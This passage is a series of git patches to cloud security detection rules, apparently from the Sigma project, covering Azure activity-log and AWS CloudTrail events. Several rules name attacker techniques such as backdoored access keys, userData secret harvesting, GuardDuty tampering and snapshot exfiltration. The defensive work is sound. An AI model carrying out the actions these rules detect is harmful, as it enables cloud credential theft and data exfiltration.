2021 23:00:43 -0500 Subject: [PATCH 0252/1367] Update azure_vpn_connection_modified_or_deleted.yml --- rules/cloud/azure_vpn_connection_modified_or_deleted.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/azure_vpn_connection_modified_or_deleted.yml b/rules/cloud/azure_vpn_connection_modified_or_deleted.yml index d41326fd..57880f26 100644 --- a/rules/cloud/azure_vpn_connection_modified_or_deleted.yml +++ b/rules/cloud/azure_vpn_connection_modified_or_deleted.yml @@ -10,7 +10,7 @@ logsource: service: azure.activitylogs detection: selection: - properties.message: + properties.message: - MICROSOFT.NETWORK/VPNGATEWAYS/VPNCONNECTIONS/WRITE - MICROSOFT.NETWORK/VPNGATEWAYS/VPNCONNECTIONS/DELETE condition: selection From 47a1ff2b96b02d70b9ca91c776db854a419ffc73 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 8 Aug 2021 23:01:19 -0500 Subject: [PATCH 0253/1367] Update azure_network_firewall_rule_modified_or_deleted.yml --- .../cloud/azure_network_firewall_rule_modified_or_deleted.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/rules/cloud/azure_network_firewall_rule_modified_or_deleted.yml b/rules/cloud/azure_network_firewall_rule_modified_or_deleted.yml index 809516ce..bb6a7780 100644 --- a/rules/cloud/azure_network_firewall_rule_modified_or_deleted.yml +++ b/rules/cloud/azure_network_firewall_rule_modified_or_deleted.yml @@ -3,14 +3,14 @@ id: 2a7d64cf-81fa-4daf-ab1b-ab80b789c067 description: Identifies when a Firewall Rule Configuration is Modified or Deleted. author: Austin Songer status: experimental -date: 2021/ +date: 2021/08/08 references: - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations logsource: service: azure.activitylogs detection: selection: - properties.message: + properties.message: - MICROSOFT.NETWORK/FIREWALLPOLICIES/RULECOLLECTIONGROUPS/WRITE - MICROSOFT.NETWORK/FIREWALLPOLICIES/RULECOLLECTIONGROUPS/DELETE - MICROSOFT.NETWORK/FIREWALLPOLICIES/RULEGROUPS/WRITE From ca115863eee54e922f45f5252d2e60a6ccfbb382 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 8 Aug 2021 23:01:43 -0500 Subject: [PATCH 0254/1367] Update azure_dns_zone_modified_or_deleted.yml --- rules/cloud/azure_dns_zone_modified_or_deleted.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/azure_dns_zone_modified_or_deleted.yml b/rules/cloud/azure_dns_zone_modified_or_deleted.yml index 8497bf20..ea3ce8a2 100644 --- a/rules/cloud/azure_dns_zone_modified_or_deleted.yml +++ b/rules/cloud/azure_dns_zone_modified_or_deleted.yml @@ -10,7 +10,7 @@ logsource: service: azure.activitylogs detection: selection: - properties.message: + properties.message: - MICROSOFT.NETWORK/DNSZONES/WRITE - MICROSOFT.NETWORK/DNSZONES/DELETE - MICROSOFT.NETWORK/DNSZONES/A/WRITE From 7a1f2c317aa1e969c380d019094a698fd8f23686 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 8 Aug 2021 23:02:42 -0500 Subject: [PATCH 0255/1367] Update azure_network_firewall_rule_modified_or_deleted.yml --- rules/cloud/azure_network_firewall_rule_modified_or_deleted.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/azure_network_firewall_rule_modified_or_deleted.yml b/rules/cloud/azure_network_firewall_rule_modified_or_deleted.yml index bb6a7780..af6398a9 100644 --- a/rules/cloud/azure_network_firewall_rule_modified_or_deleted.yml +++ b/rules/cloud/azure_network_firewall_rule_modified_or_deleted.yml @@ -11,7 +11,7 @@ logsource: detection: selection: properties.message: - - MICROSOFT.NETWORK/FIREWALLPOLICIES/RULECOLLECTIONGROUPS/WRITE + - MICROSOFT.NETWORK/FIREWALLPOLICIES/RULECOLLECTIONGROUPS/WRITE - MICROSOFT.NETWORK/FIREWALLPOLICIES/RULECOLLECTIONGROUPS/DELETE - MICROSOFT.NETWORK/FIREWALLPOLICIES/RULEGROUPS/WRITE - MICROSOFT.NETWORK/FIREWALLPOLICIES/RULEGROUPS/DELETE From 7393bde27995012dd0cd4872be4ea538dd39308c Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 8 Aug 2021 23:03:43 -0500 Subject: [PATCH 0256/1367] Update azure_dns_zone_modified_or_deleted.yml --- .../azure_dns_zone_modified_or_deleted.yml | 38 +++++++++---------- 1 file changed, 19 insertions(+), 19 deletions(-) diff --git a/rules/cloud/azure_dns_zone_modified_or_deleted.yml b/rules/cloud/azure_dns_zone_modified_or_deleted.yml index ea3ce8a2..db8e8c52 100644 --- a/rules/cloud/azure_dns_zone_modified_or_deleted.yml +++ b/rules/cloud/azure_dns_zone_modified_or_deleted.yml @@ -12,27 +12,27 @@ detection: selection: properties.message: - MICROSOFT.NETWORK/DNSZONES/WRITE - - MICROSOFT.NETWORK/DNSZONES/DELETE - - MICROSOFT.NETWORK/DNSZONES/A/WRITE - - MICROSOFT.NETWORK/DNSZONES/A/DELETE - - MICROSOFT.NETWORK/DNSZONES/AAAA/WRITE - - MICROSOFT.NETWORK/DNSZONES/AAAA/DELETE - - MICROSOFT.NETWORK/DNSZONES/CAA/READ - - MICROSOFT.NETWORK/DNSZONES/CAA/WRITE - - MICROSOFT.NETWORK/DNSZONES/CAA/DELETE - - MICROSOFT.NETWORK/DNSZONES/CNAME/WRITE - - MICROSOFT.NETWORK/DNSZONES/CNAME/DELETE - - MICROSOFT.NETWORK/DNSZONES/MX/WRITE + - MICROSOFT.NETWORK/DNSZONES/DELETE + - MICROSOFT.NETWORK/DNSZONES/A/WRITE + - MICROSOFT.NETWORK/DNSZONES/A/DELETE + - MICROSOFT.NETWORK/DNSZONES/AAAA/WRITE + - MICROSOFT.NETWORK/DNSZONES/AAAA/DELETE + - MICROSOFT.NETWORK/DNSZONES/CAA/READ + - MICROSOFT.NETWORK/DNSZONES/CAA/WRITE + - MICROSOFT.NETWORK/DNSZONES/CAA/DELETE + - MICROSOFT.NETWORK/DNSZONES/CNAME/WRITE + - MICROSOFT.NETWORK/DNSZONES/CNAME/DELETE + - MICROSOFT.NETWORK/DNSZONES/MX/WRITE - MICROSOFT.NETWORK/DNSZONES/MX/DELETE - - MICROSOFT.NETWORK/DNSZONES/NS/WRITE + - MICROSOFT.NETWORK/DNSZONES/NS/WRITE - MICROSOFT.NETWORK/DNSZONES/NS/DELETE - - MICROSOFT.NETWORK/DNSZONES/PTR/WRITE - - MICROSOFT.NETWORK/DNSZONES/PTR/DELETE - - MICROSOFT.NETWORK/DNSZONES/SOA/WRITE - - MICROSOFT.NETWORK/DNSZONES/SRV/WRITE - - MICROSOFT.NETWORK/DNSZONES/SRV/DELETE - - MICROSOFT.NETWORK/DNSZONES/TXT/WRITE - - MICROSOFT.NETWORK/DNSZONES/TXT/DELETE + - MICROSOFT.NETWORK/DNSZONES/PTR/WRITE + - MICROSOFT.NETWORK/DNSZONES/PTR/DELETE + - MICROSOFT.NETWORK/DNSZONES/SOA/WRITE + - MICROSOFT.NETWORK/DNSZONES/SRV/WRITE + - MICROSOFT.NETWORK/DNSZONES/SRV/DELETE + - MICROSOFT.NETWORK/DNSZONES/TXT/WRITE + - MICROSOFT.NETWORK/DNSZONES/TXT/DELETE condition: selection level: medium tags: From cecabddac36d6f35c230d0b95eace8eae8e93041 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Mon, 9 Aug 2021 08:28:42 +0200 Subject: [PATCH 0257/1367] formatting falsepositives --- .../azure_kubernetes_rolebinding_modified_or_deleted.yml | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/rules/cloud/azure_kubernetes_rolebinding_modified_or_deleted.yml b/rules/cloud/azure_kubernetes_rolebinding_modified_or_deleted.yml index f805aadf..8ab5492e 100644 --- a/rules/cloud/azure_kubernetes_rolebinding_modified_or_deleted.yml +++ b/rules/cloud/azure_kubernetes_rolebinding_modified_or_deleted.yml @@ -25,7 +25,6 @@ tags: - attack.impact - attack.credential_access falsepositives: - - RoleBinding/ClusterRoleBinding being modified and deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. RoleBinding/ClusterRoleBinding modification from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. - - + - RoleBinding/ClusterRoleBinding being modified and deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - RoleBinding/ClusterRoleBinding modification from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. From 6989174e4b31871058f98f04c4b9e5b5a2512883 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Mon, 9 Aug 2021 01:29:42 -0500 Subject: [PATCH 0258/1367] azure_kubernetes_secret_or_config_object_access.yml (#1790) * Create azure_kubernetes_secret_or_config_object_access.yml * Delete azure_kubernetes_secret_or_config_object_access.yml * Create azure_kubernetes_secret_or_config_object_access.yml * Update azure_kubernetes_secret_or_config_object_access.yml * Update azure_kubernetes_secret_or_config_object_access.yml * Update azure_kubernetes_secret_or_config_object_access.yml Co-authored-by: frack113 <62423083+frack113@users.noreply.github.com> --- ...ernetes_secret_or_config_object_access.yml | 27 +++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 rules/cloud/azure_kubernetes_secret_or_config_object_access.yml diff --git a/rules/cloud/azure_kubernetes_secret_or_config_object_access.yml b/rules/cloud/azure_kubernetes_secret_or_config_object_access.yml new file mode 100644 index 00000000..7fa6cbb9 --- /dev/null +++ b/rules/cloud/azure_kubernetes_secret_or_config_object_access.yml @@ -0,0 +1,27 @@ +title: Azure Kubernetes Secret or Config Object Access +id: 7ee0b4aa-d8d4-4088-b661-20efdf41a04c +description: Identifies when a Kubernetes account access a sensitve objects such as configmaps or secrets. +author: Austin Songer @austinsonger +status: experimental +date: 2021/08/07 +references: + - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes + - https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/ + - https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/ + - https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1 + - https://attack.mitre.org/matrices/enterprise/cloud/ +logsource: + service: azure.activitylogs +detection: + selection: + properties.message: + - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/CONFIGMAPS/WRITE + - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/CONFIGMAPS/DELETE + - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/SECRETS/WRITE + - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/SECRETS/DELETE + condition: selection +level: medium +tags: + - attack.impact +falsepositives: + - Sensitive objects may be accessed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Sensitive objects accessed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. From a333aa526ce15b1ca931f6b827cbcc6e40445b16 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Mon, 9 Aug 2021 08:30:52 +0200 Subject: [PATCH 0259/1367] formatting falsepositives --- rules/cloud/azure_container_registry_created_or_deleted.yml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/rules/cloud/azure_container_registry_created_or_deleted.yml b/rules/cloud/azure_container_registry_created_or_deleted.yml index 4b8897bb..661b25dc 100644 --- a/rules/cloud/azure_container_registry_created_or_deleted.yml +++ b/rules/cloud/azure_container_registry_created_or_deleted.yml @@ -22,4 +22,5 @@ level: low tags: - attack.impact falsepositives: - - Container Registry being created or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Container Registry created or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. + - Container Registry being created or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Container Registry created or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. From 5158bda8ac8beeab6a8d4aa6c9e7b8a43a4906ec Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Mon, 9 Aug 2021 08:52:50 +0200 Subject: [PATCH 0260/1367] formatting falsepositives --- .../azure_kubernetes_service_account_modified_or_deleted.yml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/rules/cloud/azure_kubernetes_service_account_modified_or_deleted.yml b/rules/cloud/azure_kubernetes_service_account_modified_or_deleted.yml index 2e89711e..891bb4c1 100644 --- a/rules/cloud/azure_kubernetes_service_account_modified_or_deleted.yml +++ b/rules/cloud/azure_kubernetes_service_account_modified_or_deleted.yml @@ -23,4 +23,5 @@ level: medium tags: - attack.impact falsepositives: - - Service account being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Service account modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. + - Service account being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Service account modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. From d66230206570fd07c37f0d956aa2c46fb9b6f808 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Mon, 9 Aug 2021 09:26:04 +0200 Subject: [PATCH 0261/1367] formatting falsepositives --- rules/cloud/azure_kubernetes_cluster_created_or_deleted.yml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/rules/cloud/azure_kubernetes_cluster_created_or_deleted.yml b/rules/cloud/azure_kubernetes_cluster_created_or_deleted.yml index ee76990b..401ddb65 100644 --- a/rules/cloud/azure_kubernetes_cluster_created_or_deleted.yml +++ b/rules/cloud/azure_kubernetes_cluster_created_or_deleted.yml @@ -22,5 +22,6 @@ level: low tags: - attack.impact falsepositives: - - Kubernetes cluster being created or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Kubernetes cluster created or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. + - Kubernetes cluster being created or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Kubernetes cluster created or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. From f63b4147cea7cd7e72683a1dc6abb012ed136caa Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Mon, 9 Aug 2021 10:06:31 +0200 Subject: [PATCH 0262/1367] formatting falsepositives --- rules/cloud/azure_kubernetes_role_access.yml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/rules/cloud/azure_kubernetes_role_access.yml b/rules/cloud/azure_kubernetes_role_access.yml index 553711ec..74b5c4ae 100644 --- a/rules/cloud/azure_kubernetes_role_access.yml +++ b/rules/cloud/azure_kubernetes_role_access.yml @@ -28,4 +28,5 @@ level: medium tags: - attack.impact falsepositives: - - ClusterRoles/Roles being modified and deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. ClusterRoles/Roles modification from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. + - ClusterRoles/Roles being modified and deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - ClusterRoles/Roles modification from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. From 30260e8bf7fd9459c308e16a71a3cae647a40b6b Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Mon, 9 Aug 2021 10:07:26 +0200 Subject: [PATCH 0263/1367] formatting falsepositives --- rules/cloud/azure_kubernetes_network_policy_change.yml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/rules/cloud/azure_kubernetes_network_policy_change.yml b/rules/cloud/azure_kubernetes_network_policy_change.yml index 85317337..15163d6e 100644 --- a/rules/cloud/azure_kubernetes_network_policy_change.yml +++ b/rules/cloud/azure_kubernetes_network_policy_change.yml @@ -25,4 +25,5 @@ tags: - attack.impact - attack.credential_access falsepositives: - - Network Policy being modified and deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Network Policy being modified and deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. + - Network Policy being modified and deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Network Policy being modified and deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. From ed23f450ea1f273180ed69c9502461ca0b94688e Mon Sep 17 00:00:00 2001 From: frack113 Date: Mon, 9 Aug 2021 15:41:40 +0200 Subject: [PATCH 0264/1367] split PR 1802 fix rules --- rules/cloud/aws_cloudtrail_disable_logging.yml | 8 ++++---- rules/cloud/aws_config_disable_recording.yml | 8 ++++---- rules/cloud/aws_ec2_disable_encryption.yml | 4 ++-- rules/cloud/aws_ec2_download_userdata.yml | 12 +++++------- rules/cloud/aws_ec2_startup_script_change.yml | 12 +++++------- rules/cloud/aws_enum_listing.yml | 5 +++-- rules/cloud/aws_guardduty_disruption.yml | 8 ++++---- rules/cloud/aws_iam_backdoor_users_keys.yml | 9 ++++----- rules/cloud/aws_rds_change_master_password.yml | 12 +++++------- rules/cloud/aws_rds_public_db_restore.yml | 12 +++++------- rules/cloud/aws_root_account_usage.yml | 6 +++--- rules/cloud/aws_snapshot_backup_exfiltration.yml | 9 ++++----- rules/cloud/aws_update_login_profile.yml | 13 +++++++------ 13 files changed, 55 insertions(+), 63 deletions(-) diff --git a/rules/cloud/aws_cloudtrail_disable_logging.yml b/rules/cloud/aws_cloudtrail_disable_logging.yml index c1634de0..816a25d5 100644 --- a/rules/cloud/aws_cloudtrail_disable_logging.yml +++ b/rules/cloud/aws_cloudtrail_disable_logging.yml @@ -4,19 +4,19 @@ status: experimental description: Detects disabling, deleting and updating of a Trail author: vitaliy0x1 date: 2020/01/21 +modified: 2021/08/09 references: - https://docs.aws.amazon.com/awscloudtrail/latest/userguide/best-practices-security.html logsource: service: cloudtrail detection: selection_source: - - eventSource: cloudtrail.amazonaws.com - events: - - eventName: + eventSource: cloudtrail.amazonaws.com + eventName: - StopLogging - UpdateTrail - DeleteTrail - condition: selection_source AND events + condition: selection_source falsepositives: - Valid change in a Trail level: medium diff --git a/rules/cloud/aws_config_disable_recording.yml b/rules/cloud/aws_config_disable_recording.yml index 331701dc..ee3f0ef9 100644 --- a/rules/cloud/aws_config_disable_recording.yml +++ b/rules/cloud/aws_config_disable_recording.yml @@ -4,16 +4,16 @@ status: experimental description: Detects AWS Config Service disabling author: vitaliy0x1 date: 2020/01/21 +modified: 2021/08/09 logsource: service: cloudtrail detection: selection_source: - - eventSource: config.amazonaws.com - events: - - eventName: + eventSource: config.amazonaws.com + eventName: - DeleteDeliveryChannel - StopConfigurationRecorder - condition: selection_source AND events + condition: selection_source falsepositives: - Valid change in AWS Config Service level: high diff --git a/rules/cloud/aws_ec2_disable_encryption.yml b/rules/cloud/aws_ec2_disable_encryption.yml index 6910dbc5..ea7330a3 100644 --- a/rules/cloud/aws_ec2_disable_encryption.yml +++ b/rules/cloud/aws_ec2_disable_encryption.yml @@ -4,6 +4,7 @@ status: stable description: Identifies disabling of default Amazon Elastic Block Store (EBS) encryption in the current region. Disabling default encryption does not change the encryption status of your existing volumes. author: Sittikorn S date: 2021/06/29 +modified: 2021/08/09 references: - https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DisableEbsEncryptionByDefault.html tags: @@ -15,8 +16,7 @@ logsource: detection: selection: eventSource: ec2.amazonaws.com - eventName: - - DisableEbsEncryptionByDefault + eventName: DisableEbsEncryptionByDefault status: success condition: selection falsepositives: diff --git a/rules/cloud/aws_ec2_download_userdata.yml b/rules/cloud/aws_ec2_download_userdata.yml index 11daeccb..073bdf6b 100644 --- a/rules/cloud/aws_ec2_download_userdata.yml +++ b/rules/cloud/aws_ec2_download_userdata.yml @@ -4,20 +4,18 @@ status: experimental description: Detects bulk downloading of User Data associated with AWS EC2 instances. Instance User Data may include installation scripts and hard-coded secrets for deployment. author: faloker date: 2020/02/11 -modified: 2020/09/01 +modified: 2021/08/09 references: - https://github.com/RhinoSecurityLabs/pacu/blob/master/modules/ec2__download_userdata/main.py#L24 logsource: service: cloudtrail detection: selection_source: - - eventSource: ec2.amazonaws.com - selection_requesttype: - - requestParameters.attribute: userData - selection_eventname: - - eventName: DescribeInstanceAttribute + eventSource: ec2.amazonaws.com + requestParameters.attribute: userData + eventName: DescribeInstanceAttribute timeframe: 30m - condition: all of them | count() > 10 + condition: selection_source | count() > 10 falsepositives: - Assets management software like device42 level: medium diff --git a/rules/cloud/aws_ec2_startup_script_change.yml b/rules/cloud/aws_ec2_startup_script_change.yml index 75e3eb5a..ac971252 100644 --- a/rules/cloud/aws_ec2_startup_script_change.yml +++ b/rules/cloud/aws_ec2_startup_script_change.yml @@ -4,19 +4,17 @@ status: experimental description: Detects changes to the EC2 instance startup script. The shell script will be executed as root/SYSTEM every time the specific instances are booted up. author: faloker date: 2020/02/12 -modified: 2020/09/01 +modified: 2021/08/09 references: - https://github.com/RhinoSecurityLabs/pacu/blob/master/modules/ec2__startup_shell_script/main.py#L9 logsource: service: cloudtrail detection: selection_source: - - eventSource: ec2.amazonaws.com - selection_userdata: - - requestParameters.userData: "*" - selection_eventname: - - eventName: ModifyInstanceAttribute - condition: all of them + eventSource: ec2.amazonaws.com + requestParameters.userData: "*" + eventName: ModifyInstanceAttribute + condition: selection_source falsepositives: - Valid changes to the startup script level: high diff --git a/rules/cloud/aws_enum_listing.yml b/rules/cloud/aws_enum_listing.yml index a768e709..fe8f1ca0 100644 --- a/rules/cloud/aws_enum_listing.yml +++ b/rules/cloud/aws_enum_listing.yml @@ -4,13 +4,14 @@ status: experimental description: Detects enumeration of accounts configuration via api call to list different instances and services within a short period of time. author: toffeebr33k date: 2020/11/21 +modified: 2021/08/09 logsource: service: cloudtrail detection: selection_eventname: - - eventName: list* + eventName: list* timeframe: 10m - condition: all of them | count() > 50 + condition: selection_eventname | count() > 50 fields: - userIdentity.arn falsepositives: diff --git a/rules/cloud/aws_guardduty_disruption.yml b/rules/cloud/aws_guardduty_disruption.yml index 6d8d2890..2181fce5 100644 --- a/rules/cloud/aws_guardduty_disruption.yml +++ b/rules/cloud/aws_guardduty_disruption.yml @@ -4,16 +4,16 @@ status: experimental description: Detects updates of the GuardDuty list of trusted IPs, perhaps to disable security alerts against malicious IPs. author: faloker date: 2020/02/11 +modified: 2021/08/09 references: - https://github.com/RhinoSecurityLabs/pacu/blob/master/modules/guardduty__whitelist_ip/main.py#L9 logsource: service: cloudtrail detection: selection_source: - - eventSource: guardduty.amazonaws.com - selection_eventName: - - eventName: CreateIPSet - condition: all of them + eventSource: guardduty.amazonaws.com + eventName: CreateIPSet + condition: selection_source falsepositives: - Valid change in the GuardDuty (e.g. to ignore internal scanners) level: high diff --git a/rules/cloud/aws_iam_backdoor_users_keys.yml b/rules/cloud/aws_iam_backdoor_users_keys.yml index af87cad9..2af725c8 100644 --- a/rules/cloud/aws_iam_backdoor_users_keys.yml +++ b/rules/cloud/aws_iam_backdoor_users_keys.yml @@ -4,19 +4,18 @@ status: experimental description: Detects AWS API key creation for a user by another user. Backdoored users can be used to obtain persistence in the AWS environment. Also with this alert, you can detect a flow of AWS keys in your org. author: faloker date: 2020/02/12 -modified: 2020/09/01 +modified: 2021/08/09 references: - https://github.com/RhinoSecurityLabs/pacu/blob/master/modules/iam__backdoor_users_keys/main.py#L6 logsource: service: cloudtrail detection: selection_source: - - eventSource: iam.amazonaws.com - selection_eventname: - - eventName: CreateAccessKey + eventSource: iam.amazonaws.com + eventName: CreateAccessKey filter: userIdentity.arn|contains: responseElements.accessKey.userName - condition: all of selection* and not filter + condition: selection_source and not filter fields: - userIdentity.arn - responseElements.accessKey.userName diff --git a/rules/cloud/aws_rds_change_master_password.yml b/rules/cloud/aws_rds_change_master_password.yml index 1c13de05..4204cbaf 100644 --- a/rules/cloud/aws_rds_change_master_password.yml +++ b/rules/cloud/aws_rds_change_master_password.yml @@ -4,19 +4,17 @@ status: experimental description: Detects the change of database master password. It may be a part of data exfiltration. author: faloker date: 2020/02/12 -modified: 2020/09/01 +modified: 2021/08/09 references: - https://github.com/RhinoSecurityLabs/pacu/blob/master/modules/rds__explore_snapshots/main.py#L10 logsource: service: cloudtrail detection: selection_source: - - eventSource: rds.amazonaws.com - selection_modified_values: - - responseElements.pendingModifiedValues.masterUserPassword: "*" - selection_eventname: - - eventName: ModifyDBInstance - condition: all of them + eventSource: rds.amazonaws.com + responseElements.pendingModifiedValues.masterUserPassword: "*" + eventName: ModifyDBInstance + condition: selection_source falsepositives: - Benign changes to a db instance level: medium diff --git a/rules/cloud/aws_rds_public_db_restore.yml b/rules/cloud/aws_rds_public_db_restore.yml index d1d81841..41497778 100644 --- a/rules/cloud/aws_rds_public_db_restore.yml +++ b/rules/cloud/aws_rds_public_db_restore.yml @@ -4,19 +4,17 @@ status: experimental description: Detects the recovery of a new public database instance from a snapshot. It may be a part of data exfiltration. author: faloker date: 2020/02/12 -modified: 2020/09/01 +modified: 2021/08/09 references: - https://github.com/RhinoSecurityLabs/pacu/blob/master/modules/rds__explore_snapshots/main.py#L10 logsource: service: cloudtrail detection: selection_source: - - eventSource: rds.amazonaws.com - selection_ispublic: - - responseElements.publiclyAccessible: "true" - selection_eventname: - - eventName: RestoreDBInstanceFromDBSnapshot - condition: all of them + eventSource: rds.amazonaws.com + responseElements.publiclyAccessible: "true" + eventName: RestoreDBInstanceFromDBSnapshot + condition: selection_source falsepositives: - unknown level: high diff --git a/rules/cloud/aws_root_account_usage.yml b/rules/cloud/aws_root_account_usage.yml index 8702c3a7..e278996f 100644 --- a/rules/cloud/aws_root_account_usage.yml +++ b/rules/cloud/aws_root_account_usage.yml @@ -4,16 +4,16 @@ status: experimental description: Detects AWS root account usage author: vitaliy0x1 date: 2020/01/21 -modified: 2020/09/01 +modified: 2021/08/09 references: - https://docs.aws.amazon.com/IAM/latest/UserGuide/id_root-user.html logsource: service: cloudtrail detection: selection_usertype: - - userIdentity.type: Root + userIdentity.type: Root selection_eventtype: - - eventType: AwsServiceEvent + eventType: AwsServiceEvent condition: selection_usertype AND NOT selection_eventtype falsepositives: - AWS Tasks That Require AWS Account Root User Credentials https://docs.aws.amazon.com/general/latest/gr/aws_tasks-that-require-root.html diff --git a/rules/cloud/aws_snapshot_backup_exfiltration.yml b/rules/cloud/aws_snapshot_backup_exfiltration.yml index e2f5b9e8..37814a8f 100644 --- a/rules/cloud/aws_snapshot_backup_exfiltration.yml +++ b/rules/cloud/aws_snapshot_backup_exfiltration.yml @@ -4,6 +4,7 @@ status: test description: Detects the modification of an EC2 snapshot's permissions to enable access from another account author: Darin Smith date: 2021/05/17 +modified: 2021/08/09 references: - https://www.justice.gov/file/1080281/download - https://attack.mitre.org/techniques/T1537/ @@ -11,11 +12,9 @@ logsource: service: cloudtrail detection: selection_source: - - eventSource: cloudtrail.amazonaws.com - events: - - eventName: - - ModifySnapshotAttribute - condition: selection_source AND events + eventSource: cloudtrail.amazonaws.com + eventName: ModifySnapshotAttribute + condition: selection_source falsepositives: - Valid change to a snapshot's permissions level: medium diff --git a/rules/cloud/aws_update_login_profile.yml b/rules/cloud/aws_update_login_profile.yml index f9654450..8ac3ea17 100644 --- a/rules/cloud/aws_update_login_profile.yml +++ b/rules/cloud/aws_update_login_profile.yml @@ -1,21 +1,22 @@ title: AWS User Login Profile Was Modified id: 055fb148-60f8-462d-ad16-26926ce050f1 status: experimental -description: An attacker with the iam:UpdateLoginProfile permission on other users can change the password used to login to the AWS console on any user that already has a login profile setup. With this alert, it is used to detect anyone is changing password on behalf of other users. +description: | + An attacker with the iam:UpdateLoginProfile permission on other users can change the password used to login to the AWS console on any user that already has a login profile setup. + With this alert, it is used to detect anyone is changing password on behalf of other users. author: toffeebr33k -date: 2020/11/21 +date: 2021/08/09 references: - https://github.com/RhinoSecurityLabs/AWS-IAM-Privilege-Escalation logsource: service: cloudtrail detection: selection_source: - - eventSource: iam.amazonaws.com - selection_eventname: - - eventName: UpdateLoginProfile + eventSource: iam.amazonaws.com + eventName: UpdateLoginProfile filter: userIdentity.arn|contains: responseElements.accessKey.userName - condition: all of selection* and not filter + condition: selection_source and not filter fields: - userIdentity.arn - responseElements.accessKey.userName From fc64b8b93754f33cc7dd69a60312b12aef03f065 Mon Sep 17 00:00:00 2001 From: frack113 Date: Mon, 9 Aug 2021 17:23:15 +0200 Subject: [PATCH 0265/1367] Split PR 1802 fix net rules --- rules/network/net_susp_dns_b64_queries.yml | 5 ++-- rules/network/net_susp_telegram_api.yml | 5 ++-- rules/proxy/proxy_ua_bitsadmin_susp_tld.yml | 5 ++-- rules/proxy/proxy_ua_suspicious.yml | 5 ++-- ...re.yml => proxy_ursnif_malware_c2_url.yml} | 28 ++----------------- .../proxy_ursnif_malware_download_url.yml | 25 +++++++++++++++++ .../web_citrix_cve_2020_8193_8195_exploit.yml | 4 +-- .../web_cve_2018_2894_weblogic_exploit.yml | 5 ++-- .../web/web_solarwinds_supernova_webshell.yml | 5 ++-- ...here_cve_2021_21972_unauth_rce_exploit.yml | 4 +-- rules/web/win_powershell_snapins_hafnium.yml | 4 +-- 11 files changed, 45 insertions(+), 50 deletions(-) rename rules/proxy/{proxy_ursnif_malware.yml => proxy_ursnif_malware_c2_url.yml} (62%) create mode 100644 rules/proxy/proxy_ursnif_malware_download_url.yml diff --git 